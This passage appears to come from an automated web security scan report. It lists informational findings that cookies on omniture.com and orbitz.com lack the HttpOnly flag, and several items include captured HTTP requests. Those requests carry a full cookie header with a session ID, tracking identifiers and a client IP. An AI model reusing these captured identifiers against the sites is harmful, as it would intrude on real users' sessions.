12.648. http://www.omniture.com/offer/411 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/411

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:05 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.649. http://www.omniture.com/offer/412 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/412

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:07 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.650. http://www.omniture.com/offer/413 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/413

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:06 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.651. http://www.omniture.com/offer/427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/427

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:43 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.652. http://www.omniture.com/offer/429 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/429

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:25:23 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.653. http://www.omniture.com/offer/435 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/435

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:27:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.654. http://www.omniture.com/offer/462 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/462

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:25:08 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.655. http://www.omniture.com/offer/704 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/704

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:32:19 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.656. http://www.omniture.com/offer/892 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/892

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Tue, 03-May-2011 19:24:51 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.657. http://www.omniture.com/offer/987 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/987

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:11 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.658. http://www.omniture.com/offer/989 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/offer/989

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 06:05:35 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.659. http://www.omniture.com/press/867 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/867

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:04 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.660. http://www.omniture.com/press/868 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/press/868

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:59:02 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.661. http://www.omniture.com/privacy/2o7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/privacy/2o7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_omniture=84542986.5892.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /privacy/2o7?f=2o7 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Server: Omniture AWS/2.0.0
Location: http://www.omniture.com/en/privacy/2o7?f=2o7
Content-Length: 330
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Wed, 02 Feb 2011 15:39:24 GMT
Connection: close
Set-Cookie: BIGipServerhttp_omniture=84542986.5892.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.omniture.com
...[SNIP]...

12.662. http://www.omniture.com/zh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.omniture.com
Path:	/zh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Wed, 04-May-2011 05:54:16 GMT; path=/; domain=omniture.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.663. http://www.orbitz.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=265DA875C314B0C54855FC80AB1B1D8C; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/
NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9;path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.664. http://www.orbitz.com/App/DPTLandingPageSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DPTLandingPageSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=CF01ADA3860370757BCE14E28DEA4DEF; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.665. http://www.orbitz.com/App/DisplayCarSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/DisplayCarSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=05C967C0F0A14D4101835934150D3894; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy||||||||||mm/dd/yy|||||||||||||||||||||||||||||||||||||||||||advanced_search|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:26 GMT; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.666. http://www.orbitz.com/App/GDDC previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/GDDC

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=F16847533E57975D98FAE3F2C4C87A82; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.667. http://www.orbitz.com/App/Home previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Home

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=C4FA721F0918D48EB0461750E018E375; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.668. http://www.orbitz.com/App/InitDealEdit previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/InitDealEdit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=B14F9784369BDA42B899F65B9ECC9BCF; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.669. http://www.orbitz.com/App/PartnerTracking previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PartnerTracking

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=3CAFC1764B7F8E6FA6842EB8D55CDFBA; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
partnerVisit=8162e4639; Domain=.orbitz.com; Path=/
partnerStamp=21611046; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.670. http://www.orbitz.com/App/PerformMDLPDealsContent previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PerformMDLPDealsContent

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=4D84CD377DBEA23C09465CAB80CFF42F; Path=/
anon=15636604731296573771992; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
OrbitzRegistration="N,0,0,0"; Domain=.orbitz.com; Expires=Mon, 27-Jan-2031 15:22:51 GMT; Path=/
logging=4D84CD377DBEA23C09465CAB80CFF42F|egapp06p|; Domain=.orbitz.com; Path=/
NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a73545525d5f4f58455e445a4a4217b9;path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.671. http://www.orbitz.com/App/PrepareActivitiesHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareActivitiesHome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=DAA865414B3F6E058AA17586FF6E5F54; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.672. http://www.orbitz.com/App/PrepareDealsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareDealsHome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=7792E3066C693DCF4AE33C8512720DC7; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.673. http://www.orbitz.com/App/PrepareFlightsTab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=8CBB5C5D3F872AB64B59A20929B92C0D; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:25 GMT; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.674. http://www.orbitz.com/App/PrepareFlightsTab&type=el_dp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareFlightsTab&type=el_dp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=436663F5D03CEDD27352E439D9083E4F; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.675. http://www.orbitz.com/App/PrepareSearchResult previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareSearchResult

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=1B30AACC6B4556110C9686DE7436274A; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.676. http://www.orbitz.com/App/PrepareVacationsHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/PrepareVacationsHome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=B95023C24A6297BB2A97C5E41C0E2856; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.677. http://www.orbitz.com/App/Sitemap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/Sitemap

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=7490BFC587B03172C0CF1BEEF6F5E0B4; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.678. http://www.orbitz.com/App/SubmitQuickSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/SubmitQuickSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=A473AE481AF0148C16EBAD58BC4AA48A; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.679. http://www.orbitz.com/App/ViewDHTMLCalendar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewDHTMLCalendar

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=F98AC81B03C0BEA00E91E9C06B484803; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: OSC=F98AC81B03C0BEA00E91E9C06B484803; Path=/
Cache-Control: private
Pragma: no-cache
Set-Cookie: logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|; Domain=.orbitz.com; Path=/
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Content-Type: text/html
ntCoent-Length: 936
Date: Wed, 02 Feb 2011 16:11:50 GMT
Content-Length: 936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<style type="text/css">

...[SNIP]...

12.680. http://www.orbitz.com/App/ViewHotelSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewHotelSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=3D7B80A1E27EBAB37F9A4F9BD9B3D63E; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.681. http://www.orbitz.com/App/ViewMyAccount previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewMyAccount

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=034BDB0327875838AA240D732B172D93; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.682. http://www.orbitz.com/App/ViewRSSHelpPage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRSSHelpPage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=178A76F3F171896D8B1D396D67B731F2; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /App/ViewRSSHelpPage?source=ft&type=l HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

12.683. http://www.orbitz.com/App/ViewRoundTripSearch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewRoundTripSearch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=E8226D3EEDD7963F144B071A614BE3C3; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|||mm/dd/yy|||||||||mm/dd/yy|mm/dd/yy||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; Domain=.orbitz.com; Expires=Tue, 28-Jan-2031 16:06:42 GMT; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.684. http://www.orbitz.com/App/ViewTravelWatchHome previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/App/ViewTravelWatchHome

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

OSC=F50F32CC6FAEFFAE6197D6FEE65AB6D2; Path=/
logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; Domain=.orbitz.com; Path=/
NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.685. http://www.orbitz.com/Secure/DelayedRegistration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/DelayedRegistration

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/DelayedRegistration?signInType=explicit&partnerUrl=updates.orbitz.com/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; dpc=HOTEL%7C1.6%7C%7CBoston%2C+MA%2C+United+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-02-01%7C2011-02-02%7C1%7C2%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C+%7C%26%26HE; OrbitzRegistration="N,0,0,0"; NSC_JOu2s3r4deikrvveb50lfpcjwwizbbq=ffffffff09e3b63045525d5f4f58455e445a4a4217b9; anon=8916556551294354144817; PackagingContext=APH; WT_FPC=id=173.193.214.243-3953790720.30125555:lv=1296573936983:ss=1296573790782; adRotator=true; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 301 MOVED PERMANENTLY
Location: http://www.orbitz.com/App/DelayedRegistration?signInType=explicit&partnerUrl=updates.orbitz.com/
Set-Cookie: NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

12.686. http://www.orbitz.com/Secure/DelayedSignIn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.orbitz.com
Path:	/Secure/DelayedSignIn

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3887545525d5f4f58455e445a4a423660;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Secure/DelayedSignIn?partnerUrl=updates.orbitz.com/ HTTP/1.1
Host: www.orbitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
